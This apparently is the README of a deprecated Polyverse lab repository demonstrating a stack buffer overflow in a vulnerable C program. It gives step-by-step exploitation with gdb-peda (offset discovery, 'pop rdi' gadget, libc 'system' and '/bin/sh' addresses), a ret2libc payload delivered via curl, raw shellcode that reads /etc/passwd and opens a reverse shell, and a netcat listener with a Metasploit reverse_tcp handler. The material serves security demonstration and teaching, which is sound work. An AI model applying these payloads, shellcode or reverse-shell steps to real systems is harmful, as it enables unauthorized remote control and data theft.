Please note that this repository has been deprecated and is no longer actively maintained by Polyverse Corporation. It may be removed in the future, but for now remains public for the benefit of any users.
Importantly, as the repository has not been maintained, it may contain unpatched security issues and other critical issues. Use at your own risk.
While it is not maintained, we would graciously consider any pull requests in accordance with our Individual Contributor License Agreement. https://github.com/polyverse/contributor-license-agreement
For any other issues, please feel free to contact [email protected]
pv build docker
docker run -it --rm --privileged -p 8080:80 --name c-exploit polyverse/c-exploit
echo 2 | tee /proc/sys/kernel/randomize_va_space
docker run -it --rm --privileged -p 8080:80 --name c-exploit polyverse/c-exploit
docker exec -it c-exploit /bin/sh socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./leak
docker exec -it c-exploit /bin/sh python leak.py #You may need to try this three or more times. Don't know why.
echo 0 | tee /proc/sys/kernel/randomize_va_space
# Determine offset of return address
gdb ./overflow
pattern_arg 100
gdb-peda$ run
gdb-peda$ x/wx $rsp
0x7fffffffe758: 0x41414341
gdb-peda$ pattern_offset 0x41414341
1094796097 found at offset: 17
gdb-peda$ print $rsp
$2 = (void *) 0x7fffffffe868
# Find a "pop rdi" gadget
gdb-peda$ ropsearch "pop rdi"
Searching for ROP gadget: 'pop rdi' in: binary ranges
0x00400a63 : (5fc3) pop rdi; ret
# Find "/bin/sh" somewhere
gdb-peda$ searchmem "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0x7ffff7b943e8 --> 0x68732f6e69622f ('/bin/sh')
# (Optional) Find "uname" somewhere
gdb-peda$ searchmem "uname"
Searching for 'uname' in: None ranges
Found 1 results, display max 1 items:
libc : 0x7ffff7a47031 --> 0x636c00656d616e75 ('uname')
# Find the "system" call
gdb-peda$ print system
$1 = {<text variable, no debug info>} 0x7ffff7a72490 <__libc_system>
# Build the payload
python payload.py 17 0x00400a63 0x7ffff7b943e8 0x7ffff7a72490 > payload
cat payload | base64 > payload64
(Add a "=" to the end of payload64)
# Test locally
./overflow $(cat payload64)
# Or
gdb ./overflow
break main
run $(cat payload64)
c
# Test remotely
curl localhost/index.php?q=QUFBQUFBQUFBQUFBQUFBQUEDCkAAAAAAADFwpPf/fwAAkCSn9/9/AAAK=
export PWN=python -c 'print "\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41"'
./getenvaddr PWN ./overflow PWN will be at 0x7fff62721e9c
python payload.py 17 0x7fff62721e9c > payload cat payload | base64 > payload64 (Add a "=" to the end of payload64)
export PWN=python -c 'print "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x15\xb3\xc7\x44\x24\x04\xac\x10\x01\x1f\x48\x89\xe6\x6a\x10\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"'
./getenvaddr PWN ./overflow PWN will be at 0x7fffffffee78
python payload.py 17 0x7fffffffee78 > payload cat payload | base64 > payload64 (Add a "=" to the end of payload64)
nc -v -l 5555
gdb-peda$ print system
$8 = {<text variable, no debug info>} 0x7ffff7a72490 <__libc_system>
gdb-peda$ searchmem "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 1 results, display max 1 items:
libc : 0x7ffff7b943e8 --> 0x68732f6e69622f ('/bin/sh')
gdb-peda$ ropsearch "pop rdi"
Searching for ROP gadget: 'pop rdi' in: binary ranges
0x00400673 : (5fc3) pop rdi; ret
You can use this container in conjunction with polyverse-internal.jfrog.io/kali-metasploit
. Run the following command:
docker run -it -p 5555:5555 polyverse-internal.jfrog.io/kali-metasploit msfconsole -x "use multi/handler; set payload linux/x86/shell_reverse_tcp; set LHOST $(docker run -it -p 5555:5555 polyverse-internal.jfrog.io/kali-metasploit ifconfig eth0 | grep inet | awk '{print $2}'); set LPORT 5555; exploit"
Then modify evil.c
to use the LHOST
and LPORT
values from the metasploit container tty.